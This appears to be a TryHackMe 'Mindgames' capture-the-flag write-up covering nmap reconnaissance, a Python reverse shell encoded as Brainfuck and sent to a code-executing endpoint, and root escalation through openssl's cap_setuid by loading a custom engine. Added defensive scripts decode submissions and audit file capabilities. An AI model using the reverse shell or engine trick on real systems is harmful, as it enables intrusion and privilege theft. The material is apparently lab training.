WriteUp — THM Mindgames
Just a terrible idea… No hints. Hack it. Don’t give up if you get stuck, enumerate harder
This is a writeup for TryHackMe room Mindgames.
Reconnaissance
Let’s start with an nmap scan.
nmap -sC -sV -p- 10.10.202.234
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 12:15 EET
Nmap scan report for 10.10.202.234
Host is up (0.051s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:4f:06:26:0e:d3:7c:b8:18:42:40:12:7a:9e:3b:71 (RSA)
| 256 5c:2b:3c:56:fd:60:2f:f7:28:34:47:55:d6:f8:8d:c1 (ECDSA)
|_ 256 da:16:8b:14:aa:58:0e:e1:74:85:6f:af:bf:6b:8d:58 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Mindgames.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gaining access
Let’s take a look at the website.
Nice. Looks like there is some Brainfuck in store for us. I test the programs listed; they are sent to the server with a POST request to /api/bf and executed there.
Maybe I need to write a program? When I try to mess with the code I start to get interesting errors:
File "<string>", line 1
print("Hello,
^
SyntaxError: EOL while scanning string literal
Maybe I should try something else, like the interpreter at https://sange.fi/esoteric/brainfuck/impl/interp/i.html
When I enter the Fibonacci program to this interpreter and run it the output is quite different from what we get from our website:
def F(n):
    if n <= 1:
        return 1
    return F(n-1)+F(n-2)
for i in range(10):
    print(F(i))
Ok so it’s actually executing a Python script. Now we need to make a more useful Python program and convert it to brainfuck. What about this?
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.8.108.247",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Now let’s find a text-to-brainfuck converter online (https://copy.sh/brainfuck/text.html) and get a shell! Here is the “shellcode” in brainfuck:
+[----->+++<]>++.++++.+++.-.+++.++.[---->+<]>+++.---[->++++<]>-.----.------------.++++++++.------.[--->+<]>---.[++>---<]>--.-[--->++<]>+.++.+[->+++<]>.++++++++++++++.++.---.------------.++.[--->+<]>----..-[++>---<]>+.-[----->+<]>.++++.>++++++++++.+[--------->+<]>.+[-->+<]>+++.---[->++<]>-.----.------------.++++++++.------.[--->+<]>---.[++>---<]>.[--->++<]>-.----.------------.++++++++.------.[--->+<]>---.+[--->+<]>+.--[->+++<]>+.----.------------.++++++++.------.[--->+<]>---.[++>---<]>.--[-->+++<]>-.+++++.[->+++++<]>+.[--->+++++<]>.+++++.---------.>-[--->+<]>-.[-->+<]>++.-[--->++<]>+.----.------------.++++++++.------.[--->+<]>---.[++>---<]>.>-[--->+<]>--.----.[----->+<]>.++++++++.--[----->+++<]>.------------.+.--.-[->++++<]>+.----.++++++++++++.+[-->+<]>++.>++++++++++.+[--------->+<]>.+[++>---<]>.--[--->+<]>-.++++++++++++.-..---------.--.-[--->+<]>--.+[--->+<]>+..------.[-->+++<]>--.-.--.++++++++++.----------.+++.-.++++++++.----------.++++.++.+++.-[--->++<]>--.++++++++++.++++++++....-----------..>++++++++++.-[------->+<]>.++++.+[++>---<]>.--[--->+<]>.--[--->+<]>-.-----.[->+++++<]>++.----------.--[->+++<]>+.+[++>---<]>.+[--->+<]>+.+++.+++.-------.+++++++++.+.+[++>---<]>.+.+++.++++.-------.---------.>++++++++++.-[------->+<]>.++++.+[++>---<]>.--[--->+<]>.--[--->+<]>-.-----.[->+++++<]>++.----------.--[->+++<]>+.+[++>---<]>.+[--->+<]>+.+++.+++.-------.+++++++++.+.+[++>---<]>.+.+++.+++++.--------.---------.>++++++++++.-[------->+<]>.++++.+[++>---<]>.--[--->+<]>.--[--->+<]>-.-----.[->+++++<]>++.----------.--[->+++<]>+.+[++>---<]>.+[--->+<]>+.+++.+++.-------.+++++++++.+.+[++>---<]>.+.+++.++++++.---------.>++++++++++.-[------->+<]>+.[-->+<]>+++++.---[->++<]>-.++.+[->+++<]>.++++++++++++++.++.---.------------.++.[--->+<]>----..+[++>---<]>.--[--->+<]>-.--.+++++++++++..[--->+<]>++++.[------>+<]>-.[->++++++<]>.+++++++++++++.++[->++<]>.+++++++.+++++.++[->+++++<]>-.-[--->++<]>-.-----------.--[--->+<]>.++++++++++.----------.+++++++++++.[--->+++++++<]>.[--->+<]>-.---[->+++<]>.-[->++++
++<]>+.
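Both the decoding step above (running the site’s Brainfuck through an interpreter to see the Python it really carries) and the text-to-brainfuck step can be done offline, which is how a reviewer would inspect a submission before it ever reaches the server. The following is an added example, not code from the room or from this writeup: a Brainfuck interpreter with a step limit for untrusted input, a naive text-to-Brainfuck encoder used to build the test input, and a check that lists the shell- or network-capable modules imported by the decoded Python. RISKY_MODULES, run_bf, text_to_bf and risky_imports are names I chose.

```python
import re

# Assumed list of modules whose presence in a decoded submission warrants review.
RISKY_MODULES = {"socket", "subprocess", "os", "pty"}

def run_bf(program, max_steps=2_000_000):
    """Interpret Brainfuck (8-bit wrapping cells, growable tape) and return its output."""
    code = [c for c in program if c in "+-<>[].,"]
    jump, stack = {}, []                      # precompute matching bracket pairs
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            j = stack.pop()                   # IndexError here means an unmatched ']'
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unmatched [")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):                # untrusted input: never loop forever
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c in "+-":
            tape[ptr] = (tape[ptr] + (1 if c == "+" else -1)) % 256
        elif c in "<>":
            ptr += 1 if c == ">" else -1
            if ptr < 0:
                raise IndexError("pointer moved left of tape")
            if ptr == len(tape):
                tape.append(0)
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif (c == "[" and tape[ptr] == 0) or (c == "]" and tape[ptr] != 0):
            pc = jump[pc]
        pc += 1                               # ',' (stdin) is ignored when analysing
    raise RuntimeError("step limit exceeded")

def text_to_bf(text):
    """Naive encoder (constructed for the test): set a cell to each byte, print it, clear it."""
    return "".join("+" * ord(ch) + ".[-]" for ch in text)

def risky_imports(source):
    """Names imported by the decoded Python that grant shell or network access."""
    found = set()
    for m in re.finditer(r"^\s*(?:import +([\w., ]+)|from +([\w.]+) +import)", source, re.M):
        for name in (m.group(1) or m.group(2)).replace(" ", "").split(","):
            if name.split(".")[0] in RISKY_MODULES:
                found.add(name)
    return sorted(found)
```

Feeding a captured /api/bf body through run_bf and then risky_imports shows what the server would have executed, without executing it.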
Privesc
Start by running linpeas.sh. No easy exploits were identified, but this might be something:
openssl has the cap_setuid capability? man capabilities explains what this does:
CAP_SETUID
* Make arbitrary manipulations of process UIDs (setuid(2), setreuid(2), setresuid(2), setfsuid(2));
* forge UID when passing socket credentials via UNIX domain sockets;
* write a user ID mapping in a user namespace (see user_namespaces(7)).
Now I need to figure out how to get openssl to call setuid(). Nothing easy on GTFOBins, but there is an entry for loading a shared library:
openssl req -engine ./lib.so
Let’s try to create our own engine with something other than crypto in mind. Taking advice from https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/
I craft a more sinister engine:
Compile and link:
gcc -fPIC -o evilengine.o -c evilengine.c
gcc -shared -o evilengine.so -lcrypto evilengine.o
Copy this to the target box and then pop a root shell:
openssl engine -t -c `pwd`/evilengine.so
BOOM!
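The root cause here is a file capability that lets a binary change its identity while that binary will also load user-supplied code. As an added audit script (not from the writeup or the room), the following parses getcap -r output in both formats libcap has printed over the years, flags files carrying cap_setuid or cap_setgid, and prints the setcap -r command that removes the capability. IDENTITY_CAPS, parse_getcap, flag_identity_caps and audit_host are assumed names; SAMPLE_GETCAP is constructed output modelled on this box’s openssl finding.

```python
import re
import subprocess

# Assumed set: capabilities that let a file change the process UID/GID. On a binary
# that also loads arbitrary code (an openssl engine, an interpreter) this is a root path.
IDENTITY_CAPS = {"cap_setuid", "cap_setgid"}

# Constructed sample of `getcap -r / 2>/dev/null`, mixing the older "path = caps+ep"
# format with the newer "path caps=ep" format.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/usr/local/bin/tool cap_setuid,cap_setgid=ep
"""

def parse_getcap(output):
    """Return {path: set of capability names} from getcap -r output in either format.
    Paths containing spaces are not handled."""
    capmap = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:                         # older libcap: '/path = cap_x+ep'
            path, caps = line.split(" = ", 1)
        else:                                     # newer libcap: '/path cap_x=ep'
            path, _, caps = line.rpartition(" ")
        capmap[path] = set(re.findall(r"cap_\w+", caps))
    return capmap

def flag_identity_caps(capmap):
    """Files that may change UID/GID via file capabilities, as (path, [caps]) tuples."""
    return sorted((path, sorted(caps & IDENTITY_CAPS))
                  for path, caps in capmap.items() if caps & IDENTITY_CAPS)

def audit_host():
    """Run getcap on the live system (needs the libcap tools) and print each finding."""
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    for path, caps in flag_identity_caps(parse_getcap(out)):
        print(f"{path}: {', '.join(caps)}  -> review; remove with: setcap -r {path}")

if __name__ == "__main__":
    audit_host()
```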